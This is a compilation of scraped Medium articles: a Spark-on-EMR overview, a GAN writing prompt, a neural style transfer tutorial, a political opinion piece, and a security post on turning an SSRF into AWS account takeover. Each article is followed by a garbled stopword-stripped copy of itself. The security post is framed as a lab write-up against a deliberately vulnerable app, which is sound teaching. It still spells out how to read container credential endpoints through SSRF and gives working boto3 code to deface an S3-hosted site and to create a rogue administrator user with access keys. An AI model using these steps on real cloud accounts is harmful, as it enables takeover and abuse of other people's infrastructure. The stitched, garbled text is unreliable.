By Dr Peter Smith, Principal Software Engineer, ACL. I recently had the good fortune of presenting at the Vancouver Amazon Web Services User Group. This monthly event, organized by Onica, is a great opportunity to network with like-minded people in the community, and to discuss AWS-related topics. In my presentation, I provided an introduction to the Apache Spark analytics framework, and gave a quick demo of using Amazon EMR (Elastic Map Reduce) to perform a few basic queries. Here’s a summary of what was discussed. Apache Spark — Unified Analytics Engine Apache Spark has rapidly become a mainstream solution for big data analytics. Numerous organizations take advantage of Spark — processing terabytes of data with the goal of discovering new insights they wouldn’t otherwise have. This includes processing of financial data, analyzing web click streams, and monitoring and reacting to data from IoT sensors. There are many ways to perform analytics with Spark. When Spark is used in a batch-processing environment, input data is placed into cheap storage (such as Amazon S3). At a later time, a Spark cluster reads the data, performs complex analytics (sometimes taking minutes or hours), then writes the final result to the output. In addition to this traditional batch-processing model, Spark also supports machine learning, real-time streaming analytics, and graph-based analytics. What makes Spark so powerful is the ability to divide and conquer. Multiple worker nodes are created, with the analytics computation being distributed amongst them. The following diagram illustrates a Spark cluster with four worker nodes (EC2 instances). Input data is stored in S3 files, and then partitioned and shared amongst the workers. The result of the analytic computation can later be written back to another S3 bucket. In addition to Apache Spark being a well-supported open source framework, with an active user community, AWS makes it trivial to create and manage Spark clusters as part of their EMR (Elastic Map Reduce) offering. More on that later. Spark is Different from a Relational Database Although Spark is often used to analyze tables of “rectangular” data (with rows and columns), and it also supports the familiar SQL language, it would be incorrect to refer to Spark as a relational database. In fact, there are numerous key differences between how Spark manipulates data, versus how the same task is performed in a relational database. To help understand the benefits provided by Spark, let’s discuss these differences. Programming Languages Most relational database systems support the SQL language for querying data. In addition, many of these systems also support the concept of stored procedures, allowing user-defined code to execute inside the database. Although stored procedures provide immense value, they’re written in the database’s specific programming language, and are limited to the run-time environment provided by the database. In the case of Spark, the SQL language is partially supported, but that’s only the starting point. Spark runs on a JVM (Java Virtual Machine) and therefore analytics code can be written in any JVM-based language, such as Java or Scala, providing compatibility with decades of existing code libraries. Additionally, the Python language is fully supported, allowing access to the great libraries and utilities that data scientists know and love. Scalability Relational databases can utilize multiple CPU cores, providing excellent vertical scalability. However, many of the advanced features (such as concurrency, locking, and failure recovery) are easier to support if those CPU cores are tightly coupled within a single server host. That is, all the CPUs must share the same memory space and therefore be inside the same physical host. In the case of Spark, support for distributed computation is of primary importance, allowing a Spark cluster to horizontally scale up to much larger data sets (running on 100s or 1000s of hosts). Of course, the distributed (multi-server) nature of Spark means that concurrency, locking, and failure recovery must be handled very differently than with a centralized database. Data Storage Formats Because of the tightly-coupled nature of a relational database, the server has complete control over how data is stored on disk. The operations for querying, inserting, and updating data rows are optimized to use data structures such as B-Trees and WALs. The database user (a human) likely knows nothing about how these data structures work, and will never examine the underlying data files. The complexity of the database is therefore hidden. In a Spark environment, the data formats are fully under the control of users. Data is read from disk in a generic format, such as CSV, JSON, or Parquet, and the final output is written back to disk in a similar user-selected format. Read/Write Versus Read-Only As a result of Spark allowing arbitrary user-chosen disk formats, all reading of input, and writing of output, happens in a user-directed way. Spark doesn’t have control of how data is placed on disk, and therefore isn’t able to insert new data rows, or update individual fields, as you’d often do in a relational database. Instead, Spark reads the data from the input file into main memory (as much as will fit at one time), then performs the analytic computation. Once the final result is complete, the output is fully written back to disk. The key point is that Spark is not suited for transactional operations where small in-place updates are made to existing data. Resilience In a relational database, it’s common to use a master-slave arrangement to recover from failures. The slave server functions in a passive state, simply tracking all the changes made to the master’s data. However, if the master server fails, the slave is promoted to become the new master, with very little downtime. Spark uses a very different approach — rather than having a hot-backup for each of the worker nodes, any failure results in the failed worker’s computation being repeated again from the beginning (or the latest check point). More specifically, Spark tracks the data’s lineage, so it knows how to regenerate the computation by replaying the same analytic tasks on a different server. With 1000s of worker nodes, there’s a good chance that one of them will fail and its work must be replayed. Note however, it would be significantly more expensive to have 1000 slaves nodes acting as hot-backups for the 1000 primary worker nodes! Always-On or On-Demand? Relational databases run on a 24/7 basis. As new data arrives, or existing data is updated, the server is always up-and-running, and available to receive and store the updates. If you have a large database with lots of CPU power and lots of RAM, the infrastructure costs start to add up. In a Spark environment, it’s common to collect data (in CSV or JSON format) and immediately place it into cheap storage (such as Amazon S3). If nothing else is done with the data at that point in time, there’s no need for Spark workers to be available. All you pay for is the low monthly cost of data in S3. However, when it’s time to perform some analytics (for example, at the end of the month, or the fiscal year), we fire up a large Spark cluster with lots of worker nodes. Only at that time is the data read into the cluster, and the intense computation is performed. Once the work is complete, the Spark cluster is shut down to save the infrastructure cost. A Practical Example As mentioned earlier, Apache Spark is an open source package, freely available for download. However, there’s still plenty of effort required to configure the worker nodes and install the software. Luckily for us, Amazon EMR makes this trivial, allowing creation of a Spark cluster in a matter of minutes. Starting the Cluster
https://medium.com/galvanize/apache-spark-on-amazon-emr-98f04fd346c9
['Peter Smith']
2018-12-17 17:01:00.945000+00:00
['Database', 'Software Development', 'Apache Spark', 'Big Data', 'AWS']
Title Apache Spark Amazon EMRContent Dr Peter Smith Principal Software Engineer ACL recently good fortune presenting Vancouver Amazon Web Services User Group monthly event organized Onica great opportunity network likeminded people community discus AWSrelated topic presentation provided introduction Apache Spark analytics framework gave quick demo using Amazon EMR Elastic Map Reduce perform basic query Here’s summary discussed Apache Spark — Unified Analytics Engine Apache Spark rapidly become mainstream solution big data analytics Numerous organization take advantage Spark — processing terabyte data goal discovering new insight wouldn’t otherwise includes processing financial data analyzing web click stream monitoring reacting data IoT sensor many way perform analytics Spark Spark used batchprocessing environment input data placed cheap storage Amazon S3 later time Spark cluster read data performs complex analytics sometimes taking minute hour writes final result output addition traditional batchprocessing model Spark also support machine learning realtime streaming analytics graphbased analytics make Spark powerful ability divide conquer Multiple worker node created analytics computation distributed amongst following diagram illustrates Spark cluster four worker node EC2 instance Input data stored S3 file partitioned shared amongst worker result analytic computation later written back another S3 bucket addition Apache Spark wellsupported open source framework active user community AWS make trivial create manage Spark cluster part EMR Elastic Map Reduce offering later Spark Different Relational Database Although Spark often used analyze table “rectangular” data row column also support familiar SQL language would incorrect refer Spark relational database fact numerous key difference Spark manipulates data versus task performed relational database help understand benefit provided Spark let’s discus difference Programming Languages relational database system support SQL language querying data addition many system also support concept stored procedure allowing userdefined code execute inside database Although stored procedure provide immense value they’re written database’s specific programming language limited runtime environment provided database case Spark SQL language partially supported that’s starting point Spark run JVM Java Virtual Machine therefore analytics code written JVMbased language Java Scala providing compatibility decade existing code library Additionally Python language fully supported allowing access great library utility data scientist know love Scalability Relational database utilize multiple CPU core providing excellent vertical scalability However many advanced feature concurrency locking failure recovery easier support CPU core tightly coupled within single server host CPUs must share memory space therefore inside physical host case Spark support distributed computation primary importance allowing Spark cluster horizontally scale much larger data set running 100 1000 host course distributed multiserver nature Spark mean concurrency locking failure recovery must handled differently centralized database Data Storage Formats tightlycoupled nature relational database server complete control data stored disk operation querying inserting updating data row optimized use data structure BTrees WALs database user human likely know nothing data structure work never examine underlying data file complexity database therefore hidden Spark environment data format fully control user Data read disk generic format CSV JSON Parquet final output written back disk similar userselected format ReadWrite Versus ReadOnly result Spark allowing arbitrary userchosen disk format reading input writing output happens userdirected way Spark doesn’t control data placed disk therefore isn’t able insert new data row update individual field you’d often relational database Instead Spark read data input file main memory much fit one time performs analytic computation final result complete output fully written back disk key point Spark suited transactional operation small inplace update made existing data Resilience relational database it’s common use masterslave arrangement recover failure slave server function passive state simply tracking change made master’s data However master server fails slave promoted become new master little downtime Spark us different approach — rather hotbackup worker node failure result failed worker’s computation repeated beginning latest check point specifically Spark track data’s lineage know regenerate computation replaying analytic task different server 1000 worker node there’s good chance one fail work must replayed Note however would significantly expensive 1000 slave node acting hotbackups 1000 primary worker node AlwaysOn OnDemand Relational database run 247 basis new data arrives existing data updated server always upandrunning available receive store update large database lot CPU power lot RAM infrastructure cost start add Spark environment it’s common collect data CSV JSON format immediately place cheap storage Amazon S3 nothing else done data point time there’s need Spark worker available pay low monthly cost data S3 However it’s time perform analytics example end month fiscal year fire large Spark cluster lot worker node time data read cluster intense computation performed work complete Spark cluster shut save infrastructure cost Practical Example mentioned earlier Apache Spark open source package freely available download However there’s still plenty effort required configure worker node install software Luckily u Amazon EMR make trivial allowing creation Spark cluster matter minute Starting ClusterTags Database Software Development Apache Spark Big Data AWS
3,878
Weekly Pentina Prompt: It’s Artificial
The above images are not real. They are not actual people, works of art, or cats. They are not photographs. There is no copyright or attribution required to use them because a computer made them up on the spot. These images are computer generated on the fly by a form of artificial intelligence known as a Generative Adversarial Network (GAN) which has been trained by lots of actual images to create these inhuman hybrids. If you use it, you will never get the same image as I do and never the same image twice. You might even find some freak occurrences with half-missing glasses, unusually large earlobes, or eyeballs in the wrong places. Don’t believe me? Stop reading this right now and go try it. How long did you spend on there? No matter. Now that you understand robots are going to take over the internet and use it to control our weak minds, it’s time to write a story. So, head back over to thispersondoesnotexist.com and start generating some very real-looking fake images until you find one that inspires a Pentina. At least this week, the picture part of your story is easy. Your prompt is to generate an interesting face (or work of art, or cat) using this mind-boggling tool and write a 50-word story about that image. Be sure to save your image and use it as the featured photo for your Pentina. Just don’t try using an image of a horse — those still need a little work ;-).
https://medium.com/centina-pentina/weekly-pentina-prompt-its-artificial-41396da6a8cc
['J.A. Taylor']
2020-12-18 14:03:24.595000+00:00
['AI', 'Pubprompt', 'Artificial Intelligence', 'Writing Prompts', 'Prompt']
Title Weekly Pentina Prompt It’s ArtificialContent image real actual people work art cat photograph copyright attribution required use computer made spot image computer generated fly form artificial intelligence known Generative Adversarial Network GAN trained lot actual image create inhuman hybrid use never get image never image twice might even find freak occurrence halfmissing glass unusually large earlobe eyeball wrong place Don’t believe Stop reading right go try long spend matter understand robot going take internet use control weak mind it’s time write story head back thispersondoesnotexistcom start generating reallooking fake image find one inspires Pentina least week picture part story easy prompt generate interesting face work art cat using mindboggling tool write 50word story image sure save image use featured photo Pentina don’t try using image horse — still need little work Tags AI Pubprompt Artificial Intelligence Writing Prompts Prompt
3,879
Deep Learning Applications : Neural Style Transfer
One of the most exciting application of Deep Learning is Neural Style Transfer. Through this article, we will understand Neural Style Transfer and implement our own Neural Style Transfer Algorithm using pre-trained Convnet Deep Learning Model. Let’s get started and understand what neural style transfer is!!. Neural style transfer is an optimization technique used to take two images, a content image & a style reference image (such as an artwork by a famous painter) and blend them together so the output image looks like the content image, but “painted” in the style of the style reference image. In neural style transfer terminology, there are 3 images. The image which needs to be painted is known as Content image. The style in which the content image will be drawn is Style image. And there will be one output image generated by the combination of these two content and style images and this technique used here is known as Neural Style Transfer. Neural Style Transfer allows us to generate new image like one in the below by combining content image and the style image. In other words, we can say that one image (Content image) is drawn in the style of the another image(Style image) to produce new image. Source: LinkedIn Here we generated new image in the right by combining the content of Mona Lisa image in the left and style image in the middle using Neural Style Transfer Algorithm. Transfer Learning Neural Style Transfer (NST) uses a previously trained convolutional network, and builds on top of that. The idea of using a network trained on a different task and applying it to a new task is called transfer learning. Following the original NST paper, we will use the VGG network. Specifically, we’ll use VGG-19, a 19-layer version of the VGG network. This model has already been trained on the very large ImageNet database, and thus has learned to recognize a variety of low level features (at the shallower layers) and high level features (at the deeper layers). Neural Style Transfer To see how well our algorithm is generating the output image from the content image drawn in the style of style image, We will build the Neural Style Transfer (NST) algorithm in three steps: Build the content cost function, Jcontent(C,G) Build the style cost function, Jstyle(S,G) Put it together to get total cost function J(G)=α Jcontent(C,G)+β Jstyle(S,G) where α and β are hyperparameters. Cost Function We have a content image C, given a style image S and our goal is to generate a new image G. In order to implement neural style transfer, we will define a cost function J(G ) that measures how well our algorithm is producing output image and we’ll use gradient descent to minimize J (G ) in order to get desired output. This cost function function will have two components. 1. The first component is called the content cost. This is a function of the content image and of the generated image and it measures how similar is the contents of the generated image to the content of the content image C. 2. The second component is style cost which is a function of S,G and it measures how similar is the style of the image G to the style of the image S. The overall cost function is defined as follows:- Here α and β are hyperparameters to specify the relative weighting between the content cost and the style cost. The algorithm runs as follows:- Initialize the generated image G randomly say 100*100 * 3 or 500*500 *3 or whatever dimension we want it to be. 2. Use gradient descent to minimize cost function defined above and we will update G as:- Here we are actually updating the pixel values of this image G. As we run gradient descent, we minimize the cost function J(G) slowly through the pixel value so then we get slowly an image that looks more and more like our content image rendered in the style of our style image. Computing the content cost( Jcontent(C,G)) Through this content cost function, we will determine how the generated image is similar to content image. We would like to make the “generated” image G to have similar content as the input image C. It is advised to choose a layer in the middle of the network — neither too shallow nor too deep as shallow layers tend to detect lower-level features such as edges and simple textures and deep layers tend to detect higher-level features such as more complex textures as well as object classes. We will find activation for both content image C and generated image G by setting both images one by one as the input to the pretrained VGG network, and run forward propagation. The contest cost function is defined as follows:- Here nH , nW and nC are the height, width and number of channels of the hidden layer we have chosen, and appear in a normalization term in the cost. , and are the height, width and number of channels of the hidden layer we have chosen, and appear in a normalization term in the cost. a(C) and a(G) are the 3D volumes corresponding to a hidden layer’s activations. Computing the style cost( Jstyle(S,G)) First we will know what is meant by style here. Style can be defined as the correlation between activations across different channels in the layer L activation. Before moving to calculate style cost, we need to understand one term Gram matrix. We also call it style matrix. In linear algebra, the Gram matrix G of a set of vectors (v1,…,vn) is the matrix of dot products, whose entries are Gij=np.dot(vi,vj). In other words, Gij compares how similar vi is to vj: If they are highly similar, you would expect them to have a large dot product, and thus for Gij to be large. In Neural Style Transfer (NST), you can compute the Style matrix by multiplying the “unrolled” filter matrix with its transpose. The result is a matrix of dimension (nC,nC) where nC is the number of filters (channels). The value G(gram)i,j measures how similar the activations of filter i are to the activations of filter j. Now we have understand gram matrix and got to know that the style of an image can be represented using the Gram matrix of a hidden layer’s activations . Our goal will be to minimize the distance between the Gram matrix of the “style” image S and the gram matrix of the “generated” image G. The corresponding style cost for a single layer l is defined as: G gram(S) : Gram matrix of the “style” image. : Gram matrix of the “style” image. G gram(G) : Gram matrix of the “generated” image. Remember, this cost is computed using the activations for a single particular hidden layer in the network. We get even better results by combining this representation from multiple different layers. This is in contrast to the content representation, where usually using just a single hidden layer is sufficient. Minimizing the style cost will cause the image G to follow the style of the image S. Optimizing Total Cost Function Now we have calculated both content cost function and style cost function, our goal will be to optimize total cost function using gradient descent so that the generated image created from content image but drawn in the style of the image of the style image. Implementation Now we have understand the concepts of Neural Style Transfer Algorithm. Finally, let’s put everything together to implement Neural Style Transfer using TensorFlow Deep Learning Framework and pretrained VGG-19 model. Here’s what the program is doing: Create an Interactive Session 2. Load the content image 3. Load the style image 4. Randomly initialize the image to be generated 5. Load the VGG19 model 6. Build the TensorFlow graph i) Run the content image through the VGG19 model and compute the content cost ii) Run the style image through the VGG19 model and compute the style cost iii) Compute the total cost iv) Define the optimizer and the learning rate 7. Initialize the TensorFlow graph and run it for a large number of iterations, updating the generated image at every step. Output of NST Algorithm:- In our example ,the content image C is the picture of the Louvre Museum in Paris. Content Image Following is the style image: Style Image And the output generated image produced by our NST algorithm:- Neural Style Transfer Note: For code implementation and better understanding, kindly visit my github repo. I hope this helps!! Thanks for reading. Any feedbacks/suggestions will be highly appreciated.
https://krsanu555.medium.com/deep-learning-applications-neural-style-transfer-6f5bcb9df8d0
['Kumar Sanu']
2020-11-29 18:42:36.828000+00:00
['Convolutional Network', 'Deep Learning', 'AI', 'Computer Vision', 'Neural Style Transfer']
Title Deep Learning Applications Neural Style TransferContent One exciting application Deep Learning Neural Style Transfer article understand Neural Style Transfer implement Neural Style Transfer Algorithm using pretrained Convnet Deep Learning Model Let’s get started understand neural style transfer Neural style transfer optimization technique used take two image content image style reference image artwork famous painter blend together output image look like content image “painted” style style reference image neural style transfer terminology 3 image image need painted known Content image style content image drawn Style image one output image generated combination two content style image technique used known Neural Style Transfer Neural Style Transfer allows u generate new image like one combining content image style image word say one image Content image drawn style another imageStyle image produce new image Source LinkedIn generated new image right combining content Mona Lisa image left style image middle using Neural Style Transfer Algorithm Transfer Learning Neural Style Transfer NST us previously trained convolutional network build top idea using network trained different task applying new task called transfer learning Following original NST paper use VGG network Specifically we’ll use VGG19 19layer version VGG network model already trained large ImageNet database thus learned recognize variety low level feature shallower layer high level feature deeper layer Neural Style Transfer see well algorithm generating output image content image drawn style style image build Neural Style Transfer NST algorithm three step Build content cost function JcontentCG Build style cost function JstyleSG Put together get total cost function JGα JcontentCGβ JstyleSG α β hyperparameters Cost Function content image C given style image goal generate new image G order implement neural style transfer define cost function JG measure well algorithm producing output image we’ll use gradient descent minimize J G order get desired output cost function function two component 1 first component called content cost function content image generated image measure similar content generated image content content image C 2 second component style cost function SG measure similar style image G style image overall cost function defined follows α β hyperparameters specify relative weighting content cost style cost algorithm run follows Initialize generated image G randomly say 100100 3 500500 3 whatever dimension want 2 Use gradient descent minimize cost function defined update G actually updating pixel value image G run gradient descent minimize cost function JG slowly pixel value get slowly image look like content image rendered style style image Computing content cost JcontentCG content cost function determine generated image similar content image would like make “generated” image G similar content input image C advised choose layer middle network — neither shallow deep shallow layer tend detect lowerlevel feature edge simple texture deep layer tend detect higherlevel feature complex texture well object class find activation content image C generated image G setting image one one input pretrained VGG network run forward propagation contest cost function defined follows nH nW nC height width number channel hidden layer chosen appear normalization term cost height width number channel hidden layer chosen appear normalization term cost aC aG 3D volume corresponding hidden layer’s activation Computing style cost JstyleSG First know meant style Style defined correlation activation across different channel layer L activation moving calculate style cost need understand one term Gram matrix also call style matrix linear algebra Gram matrix G set vector v1…vn matrix dot product whose entry Gijnpdotvivj word Gij compare similar vi vj highly similar would expect large dot product thus Gij large Neural Style Transfer NST compute Style matrix multiplying “unrolled” filter matrix transpose result matrix dimension nCnC nC number filter channel value Ggramij measure similar activation filter activation filter j understand gram matrix got know style image represented using Gram matrix hidden layer’s activation goal minimize distance Gram matrix “style” image gram matrix “generated” image G corresponding style cost single layer l defined G gramS Gram matrix “style” image Gram matrix “style” image G gramG Gram matrix “generated” image Remember cost computed using activation single particular hidden layer network get even better result combining representation multiple different layer contrast content representation usually using single hidden layer sufficient Minimizing style cost cause image G follow style image Optimizing Total Cost Function calculated content cost function style cost function goal optimize total cost function using gradient descent generated image created content image drawn style image style image Implementation understand concept Neural Style Transfer Algorithm Finally let’s put everything together implement Neural Style Transfer using TensorFlow Deep Learning Framework pretrained VGG19 model Here’s program Create Interactive Session 2 Load content image 3 Load style image 4 Randomly initialize image generated 5 Load VGG19 model 6 Build TensorFlow graph Run content image VGG19 model compute content cost ii Run style image VGG19 model compute style cost iii Compute total cost iv Define optimizer learning rate 7 Initialize TensorFlow graph run large number iteration updating generated image every step Output NST Algorithm example content image C picture Louvre Museum Paris Content Image Following style image Style Image output generated image produced NST algorithm Neural Style Transfer Note code implementation better understanding kindly visit github repo hope help Thanks reading feedbackssuggestions highly appreciatedTags Convolutional Network Deep Learning AI Computer Vision Neural Style Transfer
3,880
The Left Has a Self-Righteousness Problem
But that fact is misleading — especially since the Democratic Party used to be the party of slavery. Andrew Jackson winning the popular vote in 1824 but losing the electoral vote in the House of Representatives was undoubtedly a progressive victory, as Jackson is a president with one of the worst track records on slavery and Native Americans. When Democrat Samuel Tilden defeated Republican Rutherford B. Hayes in the popular vote by more than 200,000 votes, but lost in the Electoral College, the Democrats came to a compromise — they would pull federal troops in the South and end Reconstruction, but the more progressive Republicans would hold the executive branch. While that sounds like a terrible compromise, think about what might have happened had Tilden won or had Jackson won. It’s tough to think about hypotheticals, but would the country have been a better place if Democrats won in the 19th century? If you get rid of the Electoral College, it requires a constitutional amendment. It requires a two-thirds vote in the Senate, and a two-thirds vote in the House. It requires three-fourths vote of the states. If Trump won 26 out of 50 states, there is no chance Republicans will be on board to overturn an electoral system that favors them any time in the near future. And changing the Electoral College to a popular vote is like changing the sport you’re playing — why would any candidate campaign in rural Ohio or Michigan if the popular vote was all that mattered? If a political candidate wanted to be strategic with their time, why wouldn’t they campaign in New York, Los Angeles, Chicago, Boston, and San Francisco all the time? According to Jacob Levy, a professor at McGill University: “The game will not be any longer to be a [politician who is] liberal but be able to appeal to a rural Ohioan…The game will be: Be a liberal — to the extent I can maximize votes in major urban centers.” Of course, deceptive branding isn’t the answer either. As the Democratic Party grapples with its identity, the dreaded word of compromise is reality — and ideological purity is the dream. I would love and major police reform, universal health care, and not separating children and their parents at the borders too. But are we worried about people agreeing with our slogans, or are we worried about actually strategically passing that legislation? And the problem now is self-righteousness because it’s clear that the gap isn’t as racial as it used to be. It’s educational — liberals are simply not connecting as they used to with non-college-educated voters. The media might not have a liberal bias explicitly, but an education bias is shown to tilt liberal. The condescension has gone too far and belittling not only the white working class but the working class of all races. That is shown by the shifting tide of the 2020 election across all demographics. If the Democratic Party still wants to hold onto the claim of being the “party of the people,” then shifting towards being the party of the educated is antithetical to that dream. The answer we should seek, then is not to push center or push left, but do a deep examination of the way we brand and the way we speak. Automatically dismissing and disparaging anyone who disagrees with us makes us feel good about ourselves in our echo chambers, but it’s not winning more voters where it matters. I know a lot of people who agree with me in my city, but those aren’t the opinions that are winning votes where it matters. In the words of Lisa Lerer at the New York Times:
https://medium.com/the-apeiron-blog/the-left-has-a-self-righteousness-problem-1f520c233143
['Ryan Fan']
2020-12-29 21:07:32.199000+00:00
['Politics', 'Race', 'Nonfiction', 'Society', 'Election 2020']
Title Left SelfRighteousness ProblemContent fact misleading — especially since Democratic Party used party slavery Andrew Jackson winning popular vote 1824 losing electoral vote House Representatives undoubtedly progressive victory Jackson president one worst track record slavery Native Americans Democrat Samuel Tilden defeated Republican Rutherford B Hayes popular vote 200000 vote lost Electoral College Democrats came compromise — would pull federal troop South end Reconstruction progressive Republicans would hold executive branch sound like terrible compromise think might happened Tilden Jackson It’s tough think hypothetical would country better place Democrats 19th century get rid Electoral College requires constitutional amendment requires twothirds vote Senate twothirds vote House requires threefourths vote state Trump 26 50 state chance Republicans board overturn electoral system favor time near future changing Electoral College popular vote like changing sport you’re playing — would candidate campaign rural Ohio Michigan popular vote mattered political candidate wanted strategic time wouldn’t campaign New York Los Angeles Chicago Boston San Francisco time According Jacob Levy professor McGill University “The game longer politician liberal able appeal rural Ohioan…The game liberal — extent maximize vote major urban centers” course deceptive branding isn’t answer either Democratic Party grapple identity dreaded word compromise reality — ideological purity dream would love major police reform universal health care separating child parent border worried people agreeing slogan worried actually strategically passing legislation problem selfrighteousness it’s clear gap isn’t racial used It’s educational — liberal simply connecting used noncollegeeducated voter medium might liberal bias explicitly education bias shown tilt liberal condescension gone far belittling white working class working class race shown shifting tide 2020 election across demographic Democratic Party still want hold onto claim “party people” shifting towards party educated antithetical dream answer seek push center push left deep examination way brand way speak Automatically dismissing disparaging anyone disagrees u make u feel good echo chamber it’s winning voter matter know lot people agree city aren’t opinion winning vote matter word Lisa Lerer New York TimesTags Politics Race Nonfiction Society Election 2020
3,881
Privilege escalation in the Cloud: From SSRF to Global Account Administrator
In my previous stories, I explored different techniques for exploiting Server-Side Request Forgeries (SSRF), which can lead to unauthorized access to various resources within the internal network of a Web server. In some circumstances, SSRFs can event lead to API keys or database credentials getting compromised. In this story, I wish to show you that in the context of a Cloud application, the consequences of successful attack that uses this technique are decoupled. An attacker that can effectively leverage an SSRF on the right resource could gain complete access to one’s AWS account, and the only limit of what you can do from there is bound by your imagination. Spin a couple of c5.xlarge to harvest Bitcoins? Host a malware delivery network over S3? Your choice… The DVCA Lab Environment For this experiment, I have developed the DVCA (Damn Vulnerable Cloud Application), which is available on GitHub and has been inspired by the Damn Vulnerable Web Application project. DO NOT deploy this in your environment if you haven’t hardened it by restraining security groups to your own IP and/or change the IAM Roles given in the project. At the moment of writing, it is made of a static S3-hosted website delivered over SSL by CloudFront. You can choose wether you want a serverless backend using an API Gateway and a Lambda function, an ECS Fargate backend running a Flask container or a Classic EC2 backend running this same container. For the purpose of this article, I will concentrate on the Fargate backend. The Damn Vulnerable Cloud Application architecture From the outside, it all seems fair, HTTPS is active on both the frontend and the backends, the website is static and therefore protected from classic attacks like SQL Injections or Wordpress plugin vulnerabilities… The DVCA interface The SSRF is done through a Webhook tester, like in my first story about the subject. All backends are coded in the way that they receive an URL, read it using urllib and returns the result to the frontend, which displays it in the “debugger” frame. Roles and Permissions in AWS EC2/ECS In order to assume a role and effectively gain permissions relative to AWS resources, you will need three pieces of information: An AccessKey , a SecretKey , and a SessionToken , in the case that the credentials were issued by the Security Token Service (STS). In an EC2 or ECS infrastructure, each VM/Task can have a particular set of permission; For example, if your Web application needs to upload files to an S3 Bucket, you will need to assign it the s3:PutObject permission over the bucket. This means that our Fargate containers also need to get credentials from STS in order to do their job, if it implies calling AWS resources. In a classic EC2 scenario, the credentials for a particular instance can be fetched by the EC2 instance (and only from there, since the endpoint is not public) from the Metadata URL: http://169.254.169.254/latest/meta-data/iam/security-credentials/ . Note that you can also fetch quite a lot of sensitive informations from this IP, like UserData scripts that are likely to contain API keys and other secrets. In the case of an ECS Task, the credentials can be retrieved from a different endpoint: http://169.254.170.2/v2/credentials/<SOME_UUID> . The UUID in question can be found in the environment variables of the container, more specifically the AWS_CONTAINER_CREDENTIALS_RELATIVE_URI variable. Abusing the IAM Services through SSRFs Since the STS service is available through normal HTTP endpoints, we can trick the Fargate backend into making arbitrary requests to these endpoints, and the Frontend will happily display the result to us. But how could-we find the credentials UUID needed for the request? Well, in my other SSRF story, I showed that you can read a file using the file:// scheme. So assuming the backend is a Linux-based server, you can read the environment variables by pointing your request to file:///proc/self/environ . The relative URL for retrieving the credentials, including the UUID, can be found in /proc/self/environ Yay! Now, we can use this URI to retrieve credentials: Credentials retrieved from an SSRF request Using the credentials In order to use these credentials in a creative manner, I would suggest to use boto3 , the Python SDK for interacting with the AWS Api. Upon creating the boto3 client object, the constructor accepts credentials as parameters, so we can pass it those received from our SSRF: sts_client = boto3.client( 'sts', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) Now, to be sure that our credentials work and that we have effectively elevated privileges, the STS service has an AWS equivalent to the whoami command: get-caller-identity . Let’s verify: > print(sts_client.get_caller_identity()['Arn']) > arn:aws:sts::0123456789:assumed-role/DVCA-Fargate-Backend-DVCATaskRole-CLOUDFORMATION_ID/SOME_UUID Bingo! Now my laptop is considered by AWS like the Fargate backend of my application, meaning I have access to everything it has access. Reagarding S3 for example, the backend ECS Task has this set of permissions defined: - Effect: Allow Action: - s3:GetObject - s3:PutObject - s3:ListBucket Resource: '*' # Tip: Try to never wildcard access to resources Now, if the domain name of the DVCA is a “root” domain (that has no subdomain), chances are that the underlying S3 Bucket name is the same as the domain name, because of the way Route53 Alias Records makes it just easier to work this way. We can use this to modify the static website and inject a rogue mining script in it (for example), effectively defacing the static S3 website! s3_client = boto3.client( 's3', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) s3_client.put_object(Body=rogue_bytes, Bucket='domain.name', Key='index.html') Also note that s3:ListBucket permission which also enables the serverless equivalent of directory listing… Taking over Let’s say your Web Application has the right to create roles (a role for each customer, for example) and that this permission was implemented as - Effect: Allow Action: - iam:* # Living dangerously Resource: '*' (Very dangerous, but I am sure there are plenty of way too permissive implementations of this in the wild) for the sake of simplicity. Using the credentials retrieved through our SSRF technique and passing them to boto3 we are able to create a new Global Administrator user and create him Access Keys in just a few lines of python: iam_client = boto3.client( 'iam', aws_access_key_id=access_key, aws_secret_access_key=secret_key, aws_session_token=session_token, ) iam_client.create_user( UserName='DVCA-RogueUser' ) iam_client.attach_user_policy( PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess', UserName='DVCA-RogueUser', ) key_response = iam_client.create_access_key(UserName='DVCA-RogueUser') In this example, the keys will be in the key_response object, which you can just print-out. At this point, you won. You basically own everything in this account. A rogue administrator user created using the backend’s credentials Future work: The Lambda Backend Even though I included a serverless Lambda backend in DVCA, I was not able to exploit it yet. In this case, the credentials are injected directly in Python's os.environ , but are not part of /proc/self/environ or /proc/self/task/1/environ . I know that they are injected at the bootstrap using lambda_runtime.receive_start() , but I am not sure they are anywhere to be found on the filesystem. AWS Lambdas also do not have a metadata endpoint from which we could fetch them. My next hypothesis would be to try to retrieve them from memory, by looking at /proc/self/map* files. So if you have an idea, drop a comment below! Happy hacking! :-)
https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6
['Maxime Leblanc']
2018-09-01 13:01:01.509000+00:00
['Information Security', 'Hacking', 'AWS', 'Cloud Computing', 'Cloudformation']
Title Privilege escalation Cloud SSRF Global Account AdministratorContent previous story explored different technique exploiting ServerSide Request Forgeries SSRF lead unauthorized access various resource within internal network Web server circumstance SSRFs event lead API key database credential getting compromised story wish show context Cloud application consequence successful attack us technique decoupled attacker effectively leverage SSRF right resource could gain complete access one’s AWS account limit bound imagination Spin couple c5xlarge harvest Bitcoins Host malware delivery network S3 choice… DVCA Lab Environment experiment developed DVCA Damn Vulnerable Cloud Application available GitHub inspired Damn Vulnerable Web Application project deploy environment haven’t hardened restraining security group IP andor change IAM Roles given project moment writing made static S3hosted website delivered SSL CloudFront choose wether want serverless backend using API Gateway Lambda function ECS Fargate backend running Flask container Classic EC2 backend running container purpose article concentrate Fargate backend Damn Vulnerable Cloud Application architecture outside seems fair HTTPS active frontend backends website static therefore protected classic attack like SQL Injections Wordpress plugin vulnerabilities… DVCA interface SSRF done Webhook tester like first story subject backends coded way receive URL read using urllib return result frontend display “debugger” frame Roles Permissions AWS EC2ECS order assume role effectively gain permission relative AWS resource need three piece information AccessKey SecretKey SessionToken case credential issued Security Token Service STS EC2 ECS infrastructure VMTask particular set permission example Web application need upload file S3 Bucket need assign s3PutObject permission bucket mean Fargate container also need get credential STS order job implies calling AWS resource classic EC2 scenario credential particular instance fetched EC2 instance since endpoint public Metadata URL http169254169254latestmetadataiamsecuritycredentials Note also fetch quite lot sensitive information IP like UserData script likely contain API key secret case ECS Task credential retrieved different endpoint http1692541702v2credentialsSOMEUUID UUID question found environment variable container specifically 